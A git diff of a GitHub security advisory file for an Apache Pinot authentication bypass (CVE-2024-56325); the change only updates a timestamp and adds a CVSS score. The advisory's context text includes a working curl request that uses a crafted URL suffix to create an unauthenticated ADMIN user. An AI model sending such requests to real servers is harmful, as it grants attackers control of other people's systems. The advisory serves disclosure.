diff --git a/advisories/github-reviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json b/advisories/github-reviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json index 18fc01acac5..e878329cd68 100644 --- a/advisories/github-reviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json +++ b/advisories/github-reviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6jwp-4wvj-6597", - "modified": "2025-04-01T18:20:48Z", + "modified": "2025-04-18T18:08:15Z", "published": "2025-04-01T09:30:20Z", "aliases": [ "CVE-2024-56325" @@ -9,6 +9,10 @@ "summary": "Apache Pinot Vulnerable to Authentication Bypass", "details": "Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"} http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"